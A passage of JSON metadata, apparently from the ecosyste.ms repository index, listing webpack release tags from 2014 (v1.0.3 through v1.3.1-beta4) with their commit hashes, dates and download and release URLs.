.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta6/manifests"},{"name":"v1.2.0-beta5","sha":"2b6bfde9d5d634e47558c6f6b8589622a1fb6062","kind":"commit","published_at":"2014-05-26T21:54:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta5/manifests"},{"name":"v1.2.0-beta4","sha":"4ead6596a9a96dcde6f827ce1dce77c36701f113","kind":"commit","published_at":"2014-05-26T10:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta4/manifests"},{"name":"v1.2.0-beta3","sha":"36803b52719fa8f07d21c5fbab90f26a8b1f2bed","kind":"commit","published_at":"2014-05-22T10:17:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta3/manifests"},{"name":"v1.2.0-beta2","sha":"8ddfa0a950520306bb8694071d168a0d2a7a18a2","kind":"commit","published_at":"2014-05-21T16:34:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta2/manifests"},{"name":"v1.2.0-beta1","sha":"943a17c027279833e03a1b62fa60417cf4a5a5ac","kind":"commit","published_at":"2014-05-21T05:49:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.2.0-beta1/manifests"},{"name":"v1.1.11","sha":"2898f870eaeefcf0b60885743df8da9362883d63","kind":"commit","published_at":"2014-05-16T23:00:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.11/manifests"},{"name":"v1.1.10","sha":"7824ed8e29961197f3d74a755820f7b31fa01b5b","kind":"commit","published_at":"2014-05-08T16:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.10/manifests"},{"name":"v1.1.9","sha":"613e6a0bd0b4ca24791d01b3131b98533e33ff3a","kind":"commit","published_at":"2014-05-08T07:35:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.9/manifests"},{"name":"v1.1.8","sha":"adf3108a785630cd46daff093a80eb78f507a3a5","kind":"commit","published_at":"2014-04-19T19:36:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.8/manifests"},{"name":"v1.1.7","sha":"0ed9c759926ac0f7ec9be10643522657c6b4af53","kind":"commit","published_at":"2014-04-17T07:56:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.7/manifests"},{"name":"v1.1.6","sha":"504cb48e8fbd298fc6fa89f4fce99f30f8c072d1","kind":"commit","published_at":"2014-04-17T06:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.6/manifests"},{"name":"v1.1.5","sha":"32df8b73092c4fb59965f14ff833dfe70ba4940e","kind":"commit","published_at":"2014-04-09T07:12:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.5/manifests"},{"name":"v1.1.4","sha":"d6aa7b1388a3fe4b1a3b146a4986bb2b5ea99d03","kind":"commit","published_at":"2014-04-05T16:11:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"5dcf54c1d4885d50625d799625c14123fd412fe1","kind":"commit","published_at":"2014-04-03T17:47:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"fece5aee86748f0f230176aa25d9a7334e91be3d","kind":"commit","published_at":"2014-03-31T09:33:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"67cae9333cd53eb29efd32944961172313d9e49a","kind":"commit","published_at":"2014-03-31T06:50:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"5154409d669d871540b8052c1173244cdc1a1aa1","kind":"commit","published_at":"2014-03-25T09:31:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0/manifests"},{"name":"v1.1.0-beta12","sha":"256baf487179c7dee8254e716cd7f9d0db84842f","kind":"commit","published_at":"2014-03-21T15:22:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta12/manifests"},{"name":"v1.1.0-beta11","sha":"8af61319cbe22cb17a406180d94faab54b39a7f6","kind":"commit","published_at":"2014-03-20T07:38:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta11/manifests"},{"name":"v1.1.0-beta10","sha":"b1d5ed3dd6f84ee29070795d2b269a2a03a57c57","kind":"commit","published_at":"2014-03-19T21:16:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta10/manifests"},{"name":"v1.1.0-beta9","sha":"410c1f5bf82e66b9faaa7dbe2d9b58538c86b0e7","kind":"commit","published_at":"2014-03-18T21:45:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name"